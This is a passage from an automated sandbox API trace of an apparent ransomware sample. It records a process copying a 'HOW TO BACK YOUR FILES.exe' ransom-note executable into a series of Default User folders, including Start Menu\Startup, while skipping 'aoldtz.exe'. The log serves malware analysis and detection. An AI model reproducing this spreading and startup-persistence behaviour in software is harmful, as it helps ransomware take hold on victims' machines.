lpString2="aoldtz.exe") returned -1 [0078.519] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Templates", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Templates") returned="C:\\Documents and Settings\\Default User\\Templates" [0078.519] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4a20 | out: hHeap=0x2b0000) returned 1 [0078.519] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2260 | out: hHeap=0x2b0000) returned 1 [0078.519] lstrlenW (lpString="C:\\Documents and Settings\\Default User\\Templates") returned 48 [0078.519] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Templates" | out: lpString1="C:\\Documents and Settings\\Default User\\Templates") returned="C:\\Documents and Settings\\Default User\\Templates" [0078.519] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.519] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Templates\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\templates\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.520] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0078.520] GetLastError () returned 0x0 [0078.520] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0078.520] ReadFile (in: hFile=0x118, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0078.520] CloseHandle (hObject=0x118) returned 1 [0078.520] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0078.520] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.520] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Templates\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfda4e0ba, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x49c67800, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x49c67800, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.521] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.521] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.521] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Start Menu", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Start Menu") returned="C:\\Documents and Settings\\Default User\\Start Menu" [0078.521] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e49b0 | out: hHeap=0x2b0000) returned 1 [0078.521] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d23a0 | out: hHeap=0x2b0000) returned 1 [0078.521] lstrlenW (lpString="C:\\Documents and Settings\\Default User\\Start Menu") returned 49 [0078.521] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Start Menu" | out: lpString1="C:\\Documents and Settings\\Default User\\Start Menu") returned="C:\\Documents and Settings\\Default User\\Start Menu" [0078.521] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.521] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Start Menu\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\start menu\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.522] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0078.522] GetLastError () returned 0x0 [0078.522] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0078.522] ReadFile (in: hFile=0x118, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0078.522] CloseHandle (hObject=0x118) returned 1 [0078.522] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0078.522] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.522] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Start Menu\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x54164ce0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x54164ce0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.522] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.522] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.523] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Start Menu\\Programs", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Start Menu\\Programs") returned="C:\\Documents and Settings\\Default User\\Start Menu\\Programs" [0078.523] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c1608 | out: hHeap=0x2b0000) returned 1 [0078.523] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d23a0 | out: hHeap=0x2b0000) returned 1 [0078.523] lstrlenW (lpString="C:\\Documents and Settings\\Default User\\Start Menu\\Programs") returned 58 [0078.523] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Start Menu\\Programs" | out: lpString1="C:\\Documents and Settings\\Default User\\Start Menu\\Programs") returned="C:\\Documents and Settings\\Default User\\Start Menu\\Programs" [0078.523] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.523] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Start Menu\\Programs\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\start menu\\programs\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.523] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0078.523] GetLastError () returned 0x0 [0078.524] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0078.524] ReadFile (in: hFile=0x118, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0078.524] CloseHandle (hObject=0x118) returned 1 [0078.524] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0078.524] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.524] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Start Menu\\Programs\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x541fd260, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x541fd260, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.524] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.524] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.524] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Start Menu\\Programs\\Startup", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Start Menu\\Programs\\Startup") returned="C:\\Documents and Settings\\Default User\\Start Menu\\Programs\\Startup" [0078.524] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9eb0 | out: hHeap=0x2b0000) returned 1 [0078.524] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2400 | out: hHeap=0x2b0000) returned 1 [0078.524] lstrlenW (lpString="C:\\Documents and Settings\\Default User\\Start Menu\\Programs\\Startup") returned 66 [0078.524] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Start Menu\\Programs\\Startup" | out: lpString1="C:\\Documents and Settings\\Default User\\Start Menu\\Programs\\Startup") returned="C:\\Documents and Settings\\Default User\\Start Menu\\Programs\\Startup" [0078.524] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.524] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Start Menu\\Programs\\Startup\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\start menu\\programs\\startup\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.542] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0078.542] GetLastError () returned 0x0 [0078.542] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0078.542] ReadFile (in: hFile=0x118, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0078.542] CloseHandle (hObject=0x118) returned 1 [0078.542] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0078.542] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.542] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Start Menu\\Programs\\Startup\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x54249520, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x54249520, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.543] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.543] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.543] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Start Menu\\Programs\\Maintenance", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Start Menu\\Programs\\Maintenance") returned="C:\\Documents and Settings\\Default User\\Start Menu\\Programs\\Maintenance" [0078.543] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cff70 | out: hHeap=0x2b0000) returned 1 [0078.543] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d23e0 | out: hHeap=0x2b0000) returned 1 [0078.543] lstrlenW (lpString="C:\\Documents and Settings\\Default User\\Start Menu\\Programs\\Maintenance") returned 70 [0078.543] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Start Menu\\Programs\\Maintenance" | out: lpString1="C:\\Documents and Settings\\Default User\\Start Menu\\Programs\\Maintenance") returned="C:\\Documents and Settings\\Default User\\Start Menu\\Programs\\Maintenance" [0078.543] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.543] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Start Menu\\Programs\\Maintenance\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\start menu\\programs\\maintenance\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.544] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0078.544] GetLastError () returned 0x0 [0078.544] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0078.544] ReadFile (in: hFile=0x118, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0078.544] CloseHandle (hObject=0x118) returned 1 [0078.544] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0078.544] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.544] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Start Menu\\Programs\\Maintenance\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfda4e0ba, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x542957e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x542957e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.544] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.544] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.544] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Start Menu\\Programs\\Administrative Tools", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Start Menu\\Programs\\Administrative Tools") returned="C:\\Documents and Settings\\Default User\\Start Menu\\Programs\\Administrative Tools" [0078.544] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d7700 | out: hHeap=0x2b0000) returned 1 [0078.544] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2260 | out: hHeap=0x2b0000) returned 1 [0078.545] lstrlenW (lpString="C:\\Documents and Settings\\Default User\\Start Menu\\Programs\\Administrative Tools") returned 79 [0078.545] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Start Menu\\Programs\\Administrative Tools" | out: lpString1="C:\\Documents and Settings\\Default User\\Start Menu\\Programs\\Administrative Tools") returned="C:\\Documents and Settings\\Default User\\Start Menu\\Programs\\Administrative Tools" [0078.545] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.545] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Start Menu\\Programs\\Administrative Tools\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\start menu\\programs\\administrative tools\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.545] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0078.545] GetLastError () returned 0x0 [0078.545] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0078.545] ReadFile (in: hFile=0x118, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0078.545] CloseHandle (hObject=0x118) returned 1 [0078.545] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0078.546] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.546] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Start Menu\\Programs\\Administrative Tools\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x542e1aa0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x542e1aa0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.546] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.546] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.546] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Start Menu\\Programs\\Accessories", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Start Menu\\Programs\\Accessories") returned="C:\\Documents and Settings\\Default User\\Start Menu\\Programs\\Accessories" [0078.546] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cfed8 | out: hHeap=0x2b0000) returned 1 [0078.546] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d23a0 | out: hHeap=0x2b0000) returned 1 [0078.546] lstrlenW (lpString="C:\\Documents and Settings\\Default User\\Start Menu\\Programs\\Accessories") returned 70 [0078.546] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Start Menu\\Programs\\Accessories" | out: lpString1="C:\\Documents and Settings\\Default User\\Start Menu\\Programs\\Accessories") returned="C:\\Documents and Settings\\Default User\\Start Menu\\Programs\\Accessories" [0078.546] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.546] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Start Menu\\Programs\\Accessories\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\start menu\\programs\\accessories\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.547] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0078.547] GetLastError () returned 0x0 [0078.547] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0078.547] ReadFile (in: hFile=0x118, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0078.547] CloseHandle (hObject=0x118) returned 1 [0078.547] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0078.547] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.547] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Start Menu\\Programs\\Accessories\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x543ec440, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x543ec440, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.547] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.547] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.547] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Start Menu\\Programs\\Accessories\\System Tools", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Start Menu\\Programs\\Accessories\\System Tools") returned="C:\\Documents and Settings\\Default User\\Start Menu\\Programs\\Accessories\\System Tools" [0078.547] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e2920 | out: hHeap=0x2b0000) returned 1 [0078.547] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2260 | out: hHeap=0x2b0000) returned 1 [0078.547] lstrlenW (lpString="C:\\Documents and Settings\\Default User\\Start Menu\\Programs\\Accessories\\System Tools") returned 83 [0078.547] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Start Menu\\Programs\\Accessories\\System Tools" | out: lpString1="C:\\Documents and Settings\\Default User\\Start Menu\\Programs\\Accessories\\System Tools") returned="C:\\Documents and Settings\\Default User\\Start Menu\\Programs\\Accessories\\System Tools" [0078.547] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.548] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Start Menu\\Programs\\Accessories\\System Tools\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\start menu\\programs\\accessories\\system tools\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.548] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0078.548] GetLastError () returned 0x0 [0078.548] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0078.548] ReadFile (in: hFile=0x118, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0078.548] CloseHandle (hObject=0x118) returned 1 [0078.548] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0078.548] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.548] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Start Menu\\Programs\\Accessories\\System Tools\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfda4e0ba, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x546bfe60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x546bfe60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.549] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.549] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.549] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Start Menu\\Programs\\Accessories\\Accessibility", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Start Menu\\Programs\\Accessories\\Accessibility") returned="C:\\Documents and Settings\\Default User\\Start Menu\\Programs\\Accessories\\Accessibility" [0078.549] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c8eb8 | out: hHeap=0x2b0000) returned 1 [0078.549] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d23a0 | out: hHeap=0x2b0000) returned 1 [0078.549] lstrlenW (lpString="C:\\Documents and Settings\\Default User\\Start Menu\\Programs\\Accessories\\Accessibility") returned 84 [0078.549] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Start Menu\\Programs\\Accessories\\Accessibility" | out: lpString1="C:\\Documents and Settings\\Default User\\Start Menu\\Programs\\Accessories\\Accessibility") returned="C:\\Documents and Settings\\Default User\\Start Menu\\Programs\\Accessories\\Accessibility" [0078.549] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.549] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Start Menu\\Programs\\Accessories\\Accessibility\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\start menu\\programs\\accessories\\accessibility\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.549] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, 